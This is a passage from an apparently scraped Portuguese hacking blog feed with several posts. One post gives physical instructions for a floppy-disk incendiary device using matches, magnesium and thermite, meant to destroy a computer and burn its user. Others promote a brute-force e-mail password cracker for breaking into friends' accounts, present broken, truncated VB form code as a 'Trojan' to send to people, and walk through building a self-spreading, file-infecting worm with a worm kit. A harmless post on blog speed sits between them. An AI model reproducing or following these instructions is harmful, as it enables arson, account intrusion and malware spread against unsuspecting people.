opcional )</span><br /><br />Instruções:<br />Abra cuidadosamente o disquete. Com o disco aberto você tem que escolher entre arrancar a proteção onde fica a marca de disco ( normalmente de metal ) , ou deixar ela no lugar. Se a proteção for arrancada , a bomba vai ficar visível e você mesmo terá de de colocá-la no drive. Se a proteção ficar no lugar , você pode dar a um "amigo".<br />Raspe a cabeça do fósforo e amasse para que vire pó. Retire o pano do disquete e cubra um ou ambos os lados do disco com argamassa. Espalhe o pó dos fósforos em cima e deixe secar. Feche os discos colocando os cantos e pronto.<br />Se você quiser um estrago maior , coloque a tira de magnésio em cima do pó dos fósforos. Se você quiser destruir o computador , coloque o termite em baixo do magnésio.<br /><br />Funcionamento:<br />Quando o disco for acessado , o pó dos fósforos irá atritar e acender. O disco vai derreter e se espalhar pelo drive. Se você usou o magnésio , o calor gerado pelos fósforos vai acender as tiras. O magnésio vai queimar destruindo o drive permanente e , com sorte, outras coisas mais que estiverem perto. Se você usou o magnésio e o termite juntos , o magnésio ira acender o termite e ele vai começar a agir. O termite vai queimar o disco , o drive , o gabinete , a mesa , o chão , o quarto , e o usuário. hehehe<br /></span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-87412531553218432292009-10-06T15:14:00.000-07:002009-10-06T15:15:46.334-07:00Blog Mais RápidoUm dos grandes problemas dos blogs hospedados no blogger/blogspot (alguns em WordPress também) é que com o tempo, eles vão ficando pesados, demorando cada vez mais para abrir a página.
<br />As causas são variadas: pode ser um template mal planejado, pode ser um código CSS não otimizado, ou muitas widgets na sidebar, imagens com tamanho de arquivo grande, javascript, flash….
<br />
<br />Tenha em mente uma coisa:
<br />Ou o seu blog abre rápido mesmo em conexão discada,
<br />Ou você pode deixar de ganhar leitores e tráfego. Isso se não perder os leitores já conquistados.
<br />
<br />Quer testar o tempo de carregamento de página do seu blog/site? Vá até o site SpeedTester , digite a URL (endereço) do seu site/blog e o código de confirmação e clique em CHECK. Esse site gerará um pequeno relatório com o tempo de abertura de sua página em conexão discada (56k), ISDN (128k), UMTS, DSL (786k, banda larga normal no Brasil), T1 e T2 (conexões acima de 2 megas).
<br />O ideal é que um blog abra em no máximo 6 segundos em conexão discada.
<br />Mas o quê podemos fazer para que o blog (ou mesmo o site) fique mais rápido, com tempo menor de carregamento de página?
<br />
<br />Otimize suas METATAGS:
<br />Use somente metatags importantes para indexação de seu blog. As realmente necessárias são as Metatag Title (nome do site), Description (descrição do site, é o que vai aparecer nas buscas pelo endereço do seu blog) e Keywords (palavras-chaves).
<br />Outras metatags importantes são as de verificação do Google e do Yahoo!, e a metatag robots;
<br />Dê fim aos espaços em branco no código seu template:
<br />Pode parecer loucura, mas os espaços em branco do seu template consomem espaço no arquivo. Retirar os espaços em branco do código podem fazer seu blog/site abrir um pouco mais rápido.
<br />Se você ainda não é muito confortável com edição de códigos e tem medo de se perder, retire somente as linhas em branco. Deixe o código de seu template sem linhas em branco (sem “pular” linha).
<br />Otimize o código CSS (style) do seu template:
<br />Além de limpar as linhas em branco, você pode “abreviar” o código de seu template. Nos sites CleanCSS e/ou CSSTweaks você pode otimizar seu código online, bastando copiar e colar o código em um dos sites, e mandar otimizar.
<br />Há opções para otimização simples - somente abreviatura de parâmetros, bom para iniciantes; otimização normal - deixa cada classe em uma única linha, bom para quem tem boa base em CSS e HTML; e otimização profunda - deixa tudo em uma única linha, se você não tem o costume de ter uma cópia de seus códigos no PC não recomendo, pois esse método torna difícil a localização das classes para edição futura.
<br />Deixe os códigos em javascript em arquivos externos (fora do template):
<br />Ao invés de ficar adicionando códigos javascript na seção HEAD de seu template, adicione em páginas externas. Isso vai contribuir para que seu blog carregue mais rapidamente.
<br />Pegue o código javascript e cole no bloco de notas. Salve como “seu-javascript.js” Hospede esse arquivo em uma conta de sites (por exemplo, o GooglePages) e adicione o seguinte código na seção HEAD:
<br /><script language=”JavaScript” src=”http://seu-site-grátis.com/seu-javascript.js” type=”text/javascript”></script>
<br />Se possível, deixe também o seu CSS em arquivo externo:
<br />Igualmente ao postado acima, pegue o teu código CSS e cole no bloco de notas. Salve como “seu-estilo.css“. Hospede esse arquivo em seu host free (ou seu googlepages) e adicione o seguinte código na seção HEAD:
<br /><link rel=”stylesheet” type=”text/css” href=”http://seu-site-grátis.com/seu-estilo.css” />
<br />TABLELESS
<br />Já ouviu falar em tableless? Se não, preste atenção com carinho: tableless significa não mais usar tabelas para construir um template. Chega de TABLE, TR, TD. Essas tabela geram um enorme espaço em branco no html e fazem qualquer site carregar mais devagar, sem falar que é péssimo para indexação nos sites de busca: as tabelas “separam” o conteúdo.
<br />Dê sempre preferência ao trabalho com CSS: DIVs e classes não cortam teu conteúdo em pedacinhos, o Google agradece e seu blog fica show de bola.
<br />Diminua os comentários do código de seu template:
<br />O seu template tem vários comentários do tipo: /**** início do cabeçalho****/, /**** inicio do código do fulano *****/, <!–aqui começa o conteúdo–>, <!– fim do conteúdo–>???
<br />Se você sabe o que cada código de seu template faz, não são precisos esses comentários certo?
<br />Apague-os, deixando seu código mais leve.
<br />Use a barra “/” no fim dos diretórios em endereços URL
<br />Uma dica que parece boba, mas que faz uma enorme diferença, é usar a barra no fim de endereços. http://teublog.blogspot.com/ abre mais rápido do que http://teublog.blogspot.com . Só não adicione a barra se o endereço terminar com extensão .html, .htm, .php, .asp, etc.
<br />A barra pode e deve ser inserida em endereços absolutos e em endereços que apontem um diretório (pasta). Por exemplo, http://www.site.com/forum/. Essa dica vale tanto para o template como para postagens e sidebars.
<br />Imagens: defina SEMPRE a largura e altura
<br />Aqui a bronca aos preguiçosos de plantão: inserir uma imagem no seu blog, seja no código ou mesmo nas postagens e widgets, sem os atributos WIDTH e HEIGHT (largura e altura) obriga o navegados a ter que “calcular” essas medidas, deixando o carregamento da página mais lento. Essa dica vale tanto para o template como para postagens e sidebars.
<br />Defina sempre a largura e altura de suas imagens dentro da tag IMG SRC e veja seu blog carregar mais rápido.
<br />Mais Imagens: Use miniaturas (thumbnails) nas postagens ou diminua o tamanho de arquivo delas
<br />Usar miniaturas, além de deixar seu blog mais profissional, pode deixar ele mais rápido a seus leitores: Se o seu leitor quiser ver a imagem no tamanho real, basta clicar sobre a miniatura. Tanto o Blogger quanto o WordPress têm suporte ao uso de miniaturas.
<br />Se você prefere o tamanho normal, então use um programa para diminuir o tamanho de arquivo (procure por “Image Resize programs”), ou otimize para WEB em programas como Photoshop, PSP, GIMP, etc.
<br />NÃO USE FLASH
<br />Flash é muito bonito de se ver, mas é prá quem entende e não para quem quer. Quem trabalha ou estuda Flash vai saber fazer uma animação ou banner (ou ainda um site todo) bem leve.
<br />Mas se você é um simples blogueiro como eu, PASSE LONGE das animações em flash: elas deixam o carregamento do blog muito lento.
<br />Widgets em Flash normalmente também são lentos.
<br />Se gostar de algum Widget em Flash, teste antes prá saber se ele é pesado ou não. Seus visitantes agradecem.
<br />Há muitos outros jeitos de se deixar um site/blog bem otimizado e leve, mas essas 11 dicas já ajudam muito um blog-carroça a ganhar mais velocidade.
<br />
<br />Todavia, não coloque widgets demais no seu blog. Eles deixam de fato qualquer site mais lento. Opte pelos realmente necessários à você e seus visitantes.
<br />Também não abuse de parcerias: É legal ser linkado por todo mundo, mas colocar trezentos botões na barra lateral de seu blog vai deixar sua inicial lenta e seu visitante confuso (se ele não fechar a página antes). Não transforme teu blog em uma “penteadeira”.┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-91729918662331785222009-10-06T15:05:00.000-07:002009-10-06T15:13:04.753-07:00Hackeando e-mailsCom certeza você já quis descobrir senha de algum e-mail de um amigo, e tentou pesquisar no Google algum programa que desse conta do que você queria<br />Mas não achou nada, então alguém te disse que isso era impossível...<br />Mas existe algum programa que possa fazer isso (descobrir senhas)?<br />Sim existe, o <span style="font-weight:bold;">UNSERCURE</span> é um programa usado pelos hackers para<br />invassão força bruta.<br />Lembre que força bruta é um ataque com milhões de senhas em questões de minutos.<br />Baixe o arquivo que já vem com um Tutorial.<br />Informações<br />Estilo: Hacker<br />Tamanho: Menos de 1Mb<br />Formato: Rar<br />Idioma: Portugês<br /><br />Clique no link abaixo para Download<br /><a href="http://w16.easy-share.com/1700831700.html">http://w16.easy-share.com/1700831700.html</a>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-81058172242558693932009-10-06T14:57:00.000-07:002009-10-06T15:01:26.646-07:00Criando Cavalo de Tróia (TrojanHorse)1) Copie e cole isso no bloco de notas:<br /><br /><span style="font-weight:bold;">VERSION 5.00<br />Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"<br />Begin VB.Form Form1<br />BackColor = &H80000007&<br />BorderStyle = 1 'Fixed Single<br />Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"<br />ClientHeight = 5400<br />ClientLeft = 45<br />ClientTop = 390<br />ClientWidth = 8085<br />BeginProperty Font<br />Name = "Fixedsys"<br />Size = 9<br />Charset = 0<br />Weight = 400<br />Underline = 0 'False<br />Italic = 0 'False<br />Strikethrough = 0 'False<br />EndProperty<br />Icon = "Source3.frx":0000<br />LinkTopic = "Form1"<br />MaxButton = 0 'False<br />MinButton = 0 'False<br />MouseIcon = "Source3.frx":08CA<br />PaletteMode = 2 'Custom<br />ScaleHeight = 5400<br />ScaleWidth = 8085<br />ShowInTaskbar = 0 'False<br />StartUpPosition = 3 'Windows Default<br />Begin VB.CommandButton Command3<br />Caption = "About"<br />BeginProperty Font<br />Name = "MS Sans Serif"<br />Size = 8.25<br />Charset = 0<br />Weight = 400<br />Underline = 0 'False<br />Italic = 0 'False<br />Strikethrough = 0 'False<br />EndProperty<br />Height = 375<br />Left = 120<br />TabIndex = 3<br />Top = 4920<br />Width = 1215<br />End<br />Begin VB.CommandButton Command2<br />Appearance = 0 'Flat<br />BackColor = &H000000FF&<br />Caption = "WEBSITE"<br />BeginProperty Font<br />Name = "Trebuchet MS"<br />Size = 8.25<br />Charset = 0<br />Weight = 400<br />Underline = 0 'False<br />Italic = 0 'False<br />Strikethrough = 0 'False<br />EndProperty<br />Height</span><br /><br />2) Salve ele, mas coloque lá com extensão .bat ou .cmd<br />Ex:<br />semtítulo.bat<br />semtítulo.cmd<br />(Pode colocar com qualquer nome, mas tem que ter estas extensões)<br /><br />3) Mande Pra alguém(Cuidado pra não abri-lo em seu computador)┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-41012795495216041332009-10-06T14:51:00.000-07:002009-10-06T14:57:35.225-07:00Criando Worms<span style="font-weight:bold;">Olá pessoal, nesse tutorial eu vou mostrar como criar um worm.<br />Usarei o VBswg 2 (Procura aew no Google)<br /><br />Após ter feito o download, abra o programa...Será exibido um janela, nela clique em IAGREE:<br /><br /><br /><br />Logo em seguia aparecerá o Splash screen do programa e depois o programa:<br /><br /><br /><br />Agora com o programa aberto vamos configurar nome do worm, para onde ele vai ser copiado, qual sera a extenção e etc...<br />• Em Worm name vc bota o nome do seu worm.<br />• Em You name vc pode botar seu nome, apelido ou outra coisa...<br />• Em File name vc repete o nome do seu worm.<br />• Em Copy worm to vc bota o diretório para onde seu worm será copiado.<br />• Por ultimo vc escolhe e extenção do seu worm, veja a imagem:<br /><br /><br /><br /><br /><br />Agora clique no botão Startup<br /><br /><br /><br />Abrirá um janelinha, nessa janelinha marque a opção Start with windows e clique em Done. Isso serve para que seu worm se inicie junto com o windows:<br /><br /><br /><br />Agora, clique em no botão E-mail que está ao lado do botão Startup. Aqui o Worm envia um e-mail para todos os contatos da vítima infectada, então fica a seu gosto a mensagen.<br /><br /><br /><br />Em seguida clique em Done<br /><br />Agora clique em Irc que fica ao lado do botão E-mail, nessa janela configure como a imagem! <br /><br /><br /><br />Isso serve para infectar todos os arquivo do Mirc ( Se a vítima usar.) Clique em Done em seguida!<br /><br />Clique agora em Infect quando a janelinha abrir, marque todas as opçoes e clique em Done. Essas opções servem para que quando o seu worm for executado, infecte todos os tipos de arquivos da vítima.<br /><br /><br /><br />Clique agora em Payload, caso queira que o seu worm de uma mensagem, ou abra uma página na internet e etc... assim que for executado, marque a opção Use payload caso contrário clique em Done. Eu optei por exibir mensagem, abrir site e etc. Então vamos ver como fazer:<br /><br />• Em Message vc bota a mensagem que será exibida assim que for executado.<br />• Em Tittle vc bota o título da sua mensagem.<br />• Em Picture vc bota o tipo de mensagem que será exibida.<br /><br />Vamos à legenda da mensagem:<br /><br />-» Critical - Exibe mensagem do Tipo Erro<br />-» Information - Exibe mensagem do tipo Informação<br />-» Question - Exibe mensagem do tipo Fazendo um pergunta<br />-» Alert - Exibe uma mensagem do tipo Alertendo<br /><br />• Em Goto Url vc bota a página da web que será exibida assim que seu worm for executado.<br />• Em Shut down ele reinicia o PC assim que for executado.<br />• Em Random nem precisa mecher!<br />• Em Date é o dia que seu worm se manifestará<br /><br /><br /><br />Agora clique em Extra e depois em Antideletion, será exibida uma janelinha, nela marque as 2 opções e clique em Done. Isso serve para que seu worm não seja deletado do PC da vítima.<br /><br /><br /><br /><br /><br />Clique em Extra novamente e sem seguida clique em Encryption, quando a janela for exibida marque as opções Use encryption e Full code encryption em sequida clique em Done. Isso serve para encryptar seu worm.<br /><br /><br /><br />Após ter clicado em Done clique em Generate<br /><br /><br /><br />Após ter clicado em Generate, aparecerá a seguinte janela:<br /><br /><br /><br />Então clique em I AGREE<br /><br />Agora clique em Create:<br /><br /><br /><br />Em seguida é só botar o nome do seu worm e salvar.<br /><br /><br /><br />Após isso, será exibida a seguinte mensagem, de OK nela!<br /><br /><br /><br />Pronto, Worm Criado !! Agora é só mandar para alguem e zaz ;D<br /></span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0